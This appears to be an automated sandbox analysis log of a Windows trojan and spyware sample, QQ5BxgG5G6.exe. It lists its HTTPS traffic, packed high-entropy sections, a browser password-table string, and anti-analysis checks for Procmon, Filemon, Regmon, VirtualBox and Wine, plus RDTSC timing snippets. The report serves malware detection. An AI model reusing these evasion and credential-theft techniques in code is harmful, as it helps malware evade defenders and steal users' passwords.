              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
              Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
              Source: unknownHTTPS traffic detected: 104.21.32.96:443 -> 192.168.2.8:49705 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.32.96:443 -> 192.168.2.8:49706 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.32.96:443 -> 192.168.2.8:49707 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.32.96:443 -> 192.168.2.8:49708 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.32.96:443 -> 192.168.2.8:49709 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.32.96:443 -> 192.168.2.8:49710 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.32.96:443 -> 192.168.2.8:49712 version: TLS 1.2

              System Summary

              barindex
              Source: QQ5BxgG5G6.exeStatic PE information: section name:
              Source: QQ5BxgG5G6.exeStatic PE information: section name: .idata
              Source: QQ5BxgG5G6.exeStatic PE information: section name:
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeCode function: 0_3_015E3E1B0_3_015E3E1B
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeCode function: 0_3_015E3E1B0_3_015E3E1B
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeCode function: 0_3_015D4EA70_3_015D4EA7
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeCode function: 0_3_015D4EA70_3_015D4EA7
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeCode function: 0_3_015E3E1B0_3_015E3E1B
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeCode function: 0_3_015E3E1B0_3_015E3E1B
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeCode function: 0_3_015D4EA70_3_015D4EA7
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeCode function: 0_3_015D4EA70_3_015D4EA7
              Source: QQ5BxgG5G6.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: QQ5BxgG5G6.exeStatic PE information: Section: ZLIB complexity 0.9973177975171232
              Source: QQ5BxgG5G6.exeStatic PE information: Section: irlkmphe ZLIB complexity 0.9946247931708785
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/0@1/1
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: QQ5BxgG5G6.exe, 00000000.00000003.1487412265.0000000005C5B000.00000004.00000800.00020000.00000000.sdmp, QQ5BxgG5G6.exe, 00000000.00000003.1487198740.0000000005C76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: QQ5BxgG5G6.exeVirustotal: Detection: 56%
              Source: QQ5BxgG5G6.exeReversingLabs: Detection: 60%
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile read: C:\Users\user\Desktop\QQ5BxgG5G6.exeJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeSection loaded: webio.dllJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: QQ5BxgG5G6.exeStatic file information: File size 1866752 > 1048576
              Source: QQ5BxgG5G6.exeStatic PE information: Raw size of irlkmphe is bigger than: 0x100000 < 0x19f800

              Data Obfuscation

              barindex
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeUnpacked PE file: 0.2.QQ5BxgG5G6.exe.d00000.0.unpack :EW;.rsrc:W;.idata :W; :EW;irlkmphe:EW;zsmofqts:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;irlkmphe:EW;zsmofqts:EW;.taggant:EW;
              Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
              Source: QQ5BxgG5G6.exeStatic PE information: real checksum: 0x1d5585 should be: 0x1d2088
              Source: QQ5BxgG5G6.exeStatic PE information: section name:
              Source: QQ5BxgG5G6.exeStatic PE information: section name: .idata
              Source: QQ5BxgG5G6.exeStatic PE information: section name:
              Source: QQ5BxgG5G6.exeStatic PE information: section name: irlkmphe
              Source: QQ5BxgG5G6.exeStatic PE information: section name: zsmofqts
              Source: QQ5BxgG5G6.exeStatic PE information: section name: .taggant
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeCode function: 0_3_0161EAA0 push A00161CDh; retf 0_3_0161EAA5
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeCode function: 0_3_0161C829 push ebx; iretd 0_3_0161C82A
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeCode function: 0_3_0161EDB2 pushad ; iretd 0_3_0161EE25
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeCode function: 0_3_015CEA4C push eax; ret 0_3_015CEA4D
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeCode function: 0_3_015CEA4C push eax; ret 0_3_015CEA4D
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeCode function: 0_3_015CFBC0 pushfd ; iretd 0_3_015CFBC5
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeCode function: 0_3_015CFBC0 pushfd ; iretd 0_3_015CFBC5
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeCode function: 0_3_015CF404 push esp; retf 0_3_015CF409
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeCode function: 0_3_015CF404 push esp; retf 0_3_015CF409
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeCode function: 0_3_015D51BF push cs; iretd 0_3_015D51C0
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeCode function: 0_3_015D51BF push cs; iretd 0_3_015D51C0
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeCode function: 0_3_0162CF3A push esp; iretd 0_3_0162CF3D
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeCode function: 0_3_0162CF3A push esp; iretd 0_3_0162CF3D
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeCode function: 0_3_0162A2CB push edi; iretd 0_3_0162A2E9
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeCode function: 0_3_0162A2CB push edi; iretd 0_3_0162A2E9
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeCode function: 0_3_0162B0D7 push ds; ret 0_3_0162B120
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeCode function: 0_3_0162B0D7 push ds; ret 0_3_0162B120
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeCode function: 0_3_016282A4 push esi; retf 0_3_016282E1
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeCode function: 0_3_016282A4 push esi; retf 0_3_016282E1
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeCode function: 0_3_01628087 push ds; retf 0_3_016280A1
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeCode function: 0_3_01628087 push ds; retf 0_3_016280A1
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeCode function: 0_3_0162AE9C push cs; retf 0_3_0162AFB2
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeCode function: 0_3_0162AE9C push cs; retf 0_3_0162AFB2
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeCode function: 0_3_0162CF3A push esp; iretd 0_3_0162CF3D
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeCode function: 0_3_0162CF3A push esp; iretd 0_3_0162CF3D
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeCode function: 0_3_0162A2CB push edi; iretd 0_3_0162A2E9
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeCode function: 0_3_0162A2CB push edi; iretd 0_3_0162A2E9
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeCode function: 0_3_0162B0D7 push ds; ret 0_3_0162B120
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeCode function: 0_3_0162B0D7 push ds; ret 0_3_0162B120
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeCode function: 0_3_016282A4 push esi; retf 0_3_016282E1
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeCode function: 0_3_016282A4 push esi; retf 0_3_016282E1
              Source: QQ5BxgG5G6.exeStatic PE information: section name: entropy: 7.976685919337456
              Source: QQ5BxgG5G6.exeStatic PE information: section name: irlkmphe entropy: 7.95433500185407

              Boot Survival

              barindex
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeWindow searched: window name: FilemonClassJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeWindow searched: window name: RegmonClassJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeWindow searched: window name: FilemonClassJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeWindow searched: window name: RegmonclassJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeWindow searched: window name: FilemonclassJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeWindow searched: window name: RegmonclassJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeSystem information queried: FirmwareTableInformationJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: D583DB second address: D57C58 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F88DD0CB14Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a sub dword ptr [ebp+122D3084h], ecx 0x00000010 push dword ptr [ebp+122D16C9h] 0x00000016 pushad 0x00000017 mov esi, dword ptr [ebp+122D3ADAh] 0x0000001d mov di, 74DBh 0x00000021 popad 0x00000022 call dword ptr [ebp+122D305Ch] 0x00000028 pushad 0x00000029 cmc 0x0000002a xor eax, eax 0x0000002c add dword ptr [ebp+122D2C5Ch], ebx 0x00000032 sub dword ptr [ebp+122D2C5Ch], ecx 0x00000038 mov edx, dword ptr [esp+28h] 0x0000003c jmp 00007F88DD0CB152h 0x00000041 mov dword ptr [ebp+122D3ABEh], eax 0x00000047 pushad 0x00000048 mov ecx, 32B1ADF2h 0x0000004d cld 0x0000004e popad 0x0000004f mov esi, 0000003Ch 0x00000054 jmp 00007F88DD0CB14Ah 0x00000059 add esi, dword ptr [esp+24h] 0x0000005d cld 0x0000005e lodsw 0x00000060 jmp 00007F88DD0CB14Fh 0x00000065 add eax, dword ptr [esp+24h] 0x00000069 jmp 00007F88DD0CB14Ch 0x0000006e mov ebx, dword ptr [esp+24h] 0x00000072 pushad 0x00000073 sbb edi, 4D8821E9h 0x00000079 mov dword ptr [ebp+122D2C5Ch], edi 0x0000007f popad 0x00000080 cmc 0x00000081 nop 0x00000082 push ecx 0x00000083 jmp 00007F88DD0CB14Bh 0x00000088 pop ecx 0x00000089 push eax 0x0000008a push eax 0x0000008b push edx 0x0000008c jnc 00007F88DD0CB14Ch 0x00000092 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: EDAE02 second address: EDAE1B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F88DC6CD042h 0x00000007 pushad 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: ED9E73 second address: ED9E89 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F88DD0CB14Dh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: ED9E89 second address: ED9E8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: ED9E8F second address: ED9EA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop ebx 0x00000006 push ecx 0x00000007 pushad 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a je 00007F88DD0CB146h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: EDA1B2 second address: EDA1C6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F88DC6CD03Eh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: EDA1C6 second address: EDA1D1 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jp 00007F88DD0CB146h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: EDA1D1 second address: EDA1DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: EDA359 second address: EDA35E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: EDA4C5 second address: EDA4CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: EDA4CA second address: EDA4CF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: EDA4CF second address: EDA4D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: ED25A4 second address: ED25AF instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: EDDBA3 second address: EDDBA9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: EDDBA9 second address: EDDBC4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F88DD0CB157h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: EDDBC4 second address: EDDBFA instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a jmp 00007F88DC6CD042h 0x0000000f mov dword ptr [esp+04h], eax 0x00000013 je 00007F88DC6CD04Ch 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F88DC6CD03Eh 0x00000020 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: EDDC92 second address: EDDCE3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F88DD0CB14Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a mov edi, dword ptr [ebp+122D36EAh] 0x00000010 push 00000000h 0x00000012 push 00000000h 0x00000014 push ebx 0x00000015 call 00007F88DD0CB148h 0x0000001a pop ebx 0x0000001b mov dword ptr [esp+04h], ebx 0x0000001f add dword ptr [esp+04h], 00000014h 0x00000027 inc ebx 0x00000028 push ebx 0x00000029 ret 0x0000002a pop ebx 0x0000002b ret 0x0000002c movzx ecx, cx 0x0000002f mov dword ptr [ebp+122D2032h], ebx 0x00000035 call 00007F88DD0CB149h 0x0000003a push eax 0x0000003b push edx 0x0000003c jnp 00007F88DD0CB14Ch 0x00000042 push eax 0x00000043 push edx 0x00000044 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: EDDCE3 second address: EDDCE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: EDDCE7 second address: EDDD1C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F88DD0CB159h 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d push ebx 0x0000000e jmp 00007F88DD0CB14Eh 0x00000013 pop ebx 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: EDDD1C second address: EDDD20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: EDDD20 second address: EDDD24 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: EDDF2E second address: EDDF34 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: EDDF34 second address: EDDF5F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F88DD0CB14Ah 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 jl 00007F88DD0CB14Ch 0x00000018 pushad 0x00000019 push ecx 0x0000001a pop ecx 0x0000001b pushad 0x0000001c popad 0x0000001d popad 0x0000001e mov eax, dword ptr [eax] 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 push esi 0x00000025 pop esi 0x00000026 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: EDDF5F second address: EDDF6E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F88DC6CD03Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: EDDF6E second address: EDDF74 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: EDE02D second address: EDE031 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: EDE031 second address: EDE08E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 jmp 00007F88DD0CB14Bh 0x0000000c pop edx 0x0000000d popad 0x0000000e push eax 0x0000000f jmp 00007F88DD0CB157h 0x00000014 nop 0x00000015 mov dword ptr [ebp+122D309Eh], esi 0x0000001b push 00000000h 0x0000001d mov cx, E937h 0x00000021 call 00007F88DD0CB149h 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 jmp 00007F88DD0CB14Ah 0x0000002e jmp 00007F88DD0CB14Dh 0x00000033 popad 0x00000034 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: EDE08E second address: EDE0AD instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push ebx 0x0000000a jmp 00007F88DC6CD03Ah 0x0000000f pop ebx 0x00000010 mov eax, dword ptr [esp+04h] 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: EDE0AD second address: EDE0B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: EDE0B1 second address: EDE0B7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: EDE0B7 second address: EDE0BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: EDE0BD second address: EDE13C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a jmp 00007F88DC6CD03Bh 0x0000000f mov dword ptr [esp+04h], eax 0x00000013 jno 00007F88DC6CD049h 0x00000019 pop eax 0x0000001a mov dx, di 0x0000001d push 00000003h 0x0000001f adc dh, 00000075h 0x00000022 mov dword ptr [ebp+122D1C20h], ebx 0x00000028 push 00000000h 0x0000002a mov edx, 09E59F1Bh 0x0000002f push 00000003h 0x00000031 push 00000000h 0x00000033 push edx 0x00000034 call 00007F88DC6CD038h 0x00000039 pop edx 0x0000003a mov dword ptr [esp+04h], edx 0x0000003e add dword ptr [esp+04h], 00000014h 0x00000046 inc edx 0x00000047 push edx 0x00000048 ret 0x00000049 pop edx 0x0000004a ret 0x0000004b pushad 0x0000004c mov edi, dword ptr [ebp+122D1EA4h] 0x00000052 popad 0x00000053 call 00007F88DC6CD039h 0x00000058 push eax 0x00000059 push edx 0x0000005a pushad 0x0000005b pushad 0x0000005c popad 0x0000005d push edi 0x0000005e pop edi 0x0000005f popad 0x00000060 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: EDE13C second address: EDE146 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F88DD0CB146h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: EDE146 second address: EDE14A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
